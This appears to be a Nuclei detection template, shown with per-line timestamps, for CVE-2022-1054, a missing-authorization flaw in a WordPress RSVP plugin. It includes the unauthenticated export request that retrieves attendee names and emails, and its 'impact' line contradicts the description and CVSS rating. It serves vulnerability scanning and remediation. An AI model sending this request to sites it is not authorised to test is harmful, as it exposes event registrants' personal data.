2022-04-20 22:51:08 +00:00
id : CVE-2022-1054
info :
2023-04-06 21:30:22 +00:00
name : WordPress RSVP and Event Management <2.7.8 - Missing Authorization
2022-04-20 22:51:08 +00:00
author : Akincibor
severity : medium
2023-04-06 22:39:30 +00:00
description : WordPress RSVP and Event Management plugin before 2.7.8 is susceptible to missing authorization. The plugin does not have any authorization checks when exporting its entries, and the export function is hooked to the init action. An attacker can potentially retrieve sensitive information such as first name, last name, and email address of users registered for events,
2023-09-27 15:51:13 +00:00
impact : |
An attacker can exploit this vulnerability to perform unauthorized actions, such as creating, modifying, or deleting events.
2023-09-06 11:59:08 +00:00
remediation : |
Update the WordPress RSVP and Event Management plugin to version 2.7.8 or later.
2022-04-20 22:51:08 +00:00
reference :
- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2022-04-22 16:29:43 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
2022-04-22 16:29:43 +00:00
cve-id : CVE-2022-1054
cwe-id : CWE-862
2023-11-10 09:15:01 +00:00
epss-score : 0.00292
2024-05-31 19:23:20 +00:00
epss-percentile : 0.69101
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : wpchill
product : rsvp_and_event_management
2023-09-06 11:59:08 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve,cve2022,wordpress,wpscan,wp,wp-plugin,wpchill
2022-04-20 22:51:08 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-20 22:51:08 +00:00
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'RSVP Status'
2022-04-22 13:27:48 +00:00
- '"First Name"'
condition : and
2022-04-20 22:51:08 +00:00
- type : status
status :
- 200
2024-06-01 06:53:00 +00:00
# digest: 4a0a00473045022100a4bc9ee7b3b382b2a550ed90ea01e420bd1fc66b176c9cb51bd906fb76ea96bd0220548a1e2063e83652db28af9ca480570124261ee3de3aee962c736b2d82856e65:922c64590222798bb761d5b6d8e72950